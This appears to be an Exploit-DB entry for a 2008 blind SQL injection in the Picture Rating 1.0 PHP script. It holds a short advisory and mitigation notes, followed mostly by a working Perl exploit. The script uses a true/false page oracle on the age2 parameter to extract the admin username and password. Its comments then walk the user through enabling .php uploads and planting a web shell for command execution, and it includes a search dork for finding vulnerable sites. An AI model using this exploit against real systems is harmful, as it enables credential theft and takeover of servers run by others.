Vendor: Picture Rating 1.0
By: t0pP8uZz
CVSS: 7.5 (HIGH)
Vulnerability type: Blind SQL Injection
Product Name: Picture Rating 1.0
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2008

Picture Rating 1.0 Blind SQL Injection Exploit

This exploit performs a boolean-based blind SQL injection against the unsanitised `age2` parameter of `index.php?cmd=11&listpics=Y` on a host running the Picture Rating 1.0 script. The page renders a "Previous" pager link only when the injected condition is true, and the script uses that true/false oracle to read the administrator's username and password field out of the `admin` table one character at a time. With those details the attacker logs in to the admin area at /control/, adds ".php" to the allowed upload extensions under "edit settings", uploads a PHP shell through the ordinary image/photo upload as a normal user, and then opens the uploaded file's URL to obtain command execution on the server.

Mitigation:

The vendor was not notified about this vulnerability and no patch is known. The root cause is that the `age1`/`age2` values from the query string are concatenated into the SQL statement unquoted (the payload `age2=99 and 1=1` works without closing any quote), so the fix is to cast these values to integers or bind them as prepared-statement parameters; the upload extension whitelist should also be enforced server-side rather than being an admin-editable setting. Users should upgrade to a newer, more secure version of the software or find an alternative solution.

Exploit-DB raw data:

#!/usr/bin/perl

# -- Picture Rating 1.0 Blind SQL Injection Exploit --

# -Info/Instructions-
# After running this perl script you will have the admin details, so you will be able to log in to the admin area at http://site.com/control/
# Once you have logged in as admin you can upload a shell: click "edit settings" and under the allowed extensions add ".php". Now
# register as a normal user (or back up the database and take an existing user's details), log in to the main site, navigate to upload image/photo, choose your shell and click upload.
# The shell should upload successfully and you will see a broken image; right-click the broken image icon and copy the link, navigate to this link in your browser and that's your shell ;)


# Vendor Not Notified
# Discovered By: t0pP8uZz
# Discovered On: 6 April 2008
# greetz: milw0rm.com, h4ck-y0u.org, ciphercrew!

# inurl:"index.php?cmd=" Latest Pictures hot 

# -- Picture Rating 1.0 Blind SQL Injection Exploit --

use strict;
use warnings;
use LWP::Simple;

# The injection point is the unsanitised age2 parameter of index.php?cmd=11&listpics=Y.
# The page prints a "Previous" pager link only when the query returns rows, which gives
# a boolean oracle: append a condition and check whether "Previous" is in the response.
my $inject = "/index.php?cmd=11&listpics=Y&age1=13&age2=99";

print "---------- Picture Rating 1.0 Blind SQL Injection Exploit ----------\n";
print "-  Discovered && Coded By: t0pP8uZz                                -\n";
print "-                                  Discovered On: 6 April 2008     -\n";
print "-                                                                  -\n";
print "-   This exploit will perform an automated BLIND SQL attack on ..  -\n";
print "-   .. the target host which is running the script.                -\n";
print "--------------------------------------------------------------------\n";

print "\nEnter URL (ie: http://site.com/): ";
chomp(my $url = <STDIN>);
$url =~ s{/+$}{};   # drop a trailing slash so we do not request http://site.com//index.php

if (inject_test($url)) {
	print "Injecting.. Please Wait this could take several minutes..\n\n";
	my $details = blind($url);
	print "Exploit Success! Admin Details: ".$details."\n";
	exit;
}

# Fetch a page; a failed request dies instead of matching a regex against undef.
sub fetch {
	my $target  = shift;
	my $content = get($target);
	defined $content or die "Request failed: $target\n";
	return $content;
}

sub blind {

	my $url    = shift;
	my $res    = '';
	my $chr    = 48;   # start at '0': assumes username and password are alphanumeric
	my $substr = 1;    # 1-based position inside the CONCAT() result
	my $done   = 1;

	# CONCAT(username,0x3a,password,0x5E) yields "user:pass^". The hex literals avoid
	# quotes (so magic_quotes does not matter) and 0x5E ('^') is a terminator that
	# tells us when the whole string has been read.
	while ($done) {
		my $content = fetch($url.$inject." and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM admin),".$substr.",1))=".$chr."/*");

		if ($content =~ /Previous/ && $chr == 94) { $done = 0; }                        # reached the '^' terminator
		elsif ($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }     # character found, next position
		elsif ($chr >= 126) { die "No match at position $substr; the oracle is unreliable.\n"; }  # never loop forever
		else { $chr++; }
	}
	return $res;
}

sub inject_test {

	my $url   = shift;
	my $true  = fetch($url.$inject." and 1=1");
	my $false = fetch($url.$inject." and 1=2");

	if ($true =~ /Previous/ && $false !~ /Previous/) {
		print "\nTarget Site Vulnerable!\n\n";
		return 1;
	} else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }
}

# milw0rm.com [2008-04-05]